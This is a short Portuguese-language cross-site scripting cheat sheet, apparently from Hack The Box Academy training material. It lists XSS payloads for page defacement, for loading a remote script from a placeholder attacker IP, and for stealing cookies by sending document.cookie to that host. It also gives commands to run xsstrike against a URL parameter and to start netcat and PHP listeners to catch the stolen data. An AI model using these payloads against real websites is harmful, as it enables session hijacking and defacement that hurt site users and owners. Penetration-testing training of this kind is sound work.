# Cheat Sheet
| Código | Descrição |
| --------------------------------------------------------------------------------------------- | ------------------------------------ |
| **Cargas XSS** | |
| `` | Carga útil XSS básica |
| `<![CDATA[` | Carga útil XSS básica |
| `<script>print()</script>` | Carga útil XSS básica |
| `<img src="" onerror=alert(window.origin)>` | Carga útil XSS baseada em HTML |
| `<script>document.body.style.background = "#141d2b"</script>` | Alterar cor de fundo |
| `<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>` | Alterar imagem de fundo |
| `<script>document.title = 'HackTheBox Academy'</script>` | Alterar o título do site |
| `<script>document.getElementsByTagName('body')[0].innerHTML = 'text'</script>` | Substituir o corpo principal do site |
| `<script>document.getElementById('urlform').remove();</script>` | Remover determinado elemento HTML |
| `<script src="http://OUR_IP/script.js"></script>` | Carregar script remoto |
| `<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>` | Envie detalhes do cookie para nós |
#### Tools
| **Comandos** | **Descrição** |
| ------------------------------------------------------------------- | ---------------------------------------- |
| `python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test"` | Execute `xsstrike`em um parâmetro de URL |
| `sudo nc -lvnp 80` | Iniciar `netcat`ouvinte |
| `sudo php -S 0.0.0.0:80` | Iniciar `PHP`servidor |
]]></plaintext></span>